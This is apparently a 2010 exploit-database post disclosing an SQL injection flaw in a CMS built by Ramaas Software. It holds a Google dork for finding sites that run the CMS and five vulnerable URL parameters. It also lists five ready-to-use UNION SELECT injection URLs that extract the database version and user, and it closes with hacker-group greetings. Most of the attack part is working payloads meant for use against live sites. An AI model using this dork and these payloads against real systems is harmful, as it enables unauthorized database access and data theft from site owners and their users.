# Exploit Title: Ramaas Software CMS SQL Injection Vulnerability # Date: 27-4-2010 # Author: 41.w4r10r # Software Link : # Version: Web Application # Tested on: Apcahe/Unix # CVE : [if exists] # Dork : intext:"Powered by Ramaas Software" # Code : --------------------------------------------------------------------------------------- ############################################################################ #Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber Warriors] #Thanks: SaiSatish,FB1H2S,Godwin_Austin,Micr0,Mannu,Harin,Jappy,Dark_Blue,Hoodlum #Shoutz: hg_H@x0r,r45c4l,Yash,Hackuin,unn4m3d #Catch us at www.andhrahackers.com or www.teamicw.in ############################################################################ This Is The CMS Created by The Leading WebDevelopment Company ramaas.com For There Clients and all have same vulnerability..... Exploited Link : 1) http://example.com/display_agents.php?id=243' 2) http://example.com/view.php?articleid=14567' 3) http://example.com/view_businessnews.php?articleid=7' 4) http://example.com/view_article.php?articleid=12242' 5) http://example.com/article.php?articleid=111' Live Demo : 1) http://example.com/display_agents.php?id=-243+union+select+all+1,2,3,version(),5,user(),7,8-- 2) http://example.com/view.php?articleid=-14567+union+select+all+1,2,3,version(),5,user(),7,8,9,10-- 3) http://example.com/view_businessnews.php?articleid=-7+union+select+all+1,2,3,version(),user(),6,7,8,9-- 4) http://example.com/view_article.php?articleid=-12242+union+select+all+1,2,3,version(),user(),6,7,8,9-- 5) http://example.com/article.php?articleid=-111+union+select+all+1,2,3,version(),5,user(),7,8,9,10,11-- #41.w4r10r mailto:41.w4r10r@andhrahackers.com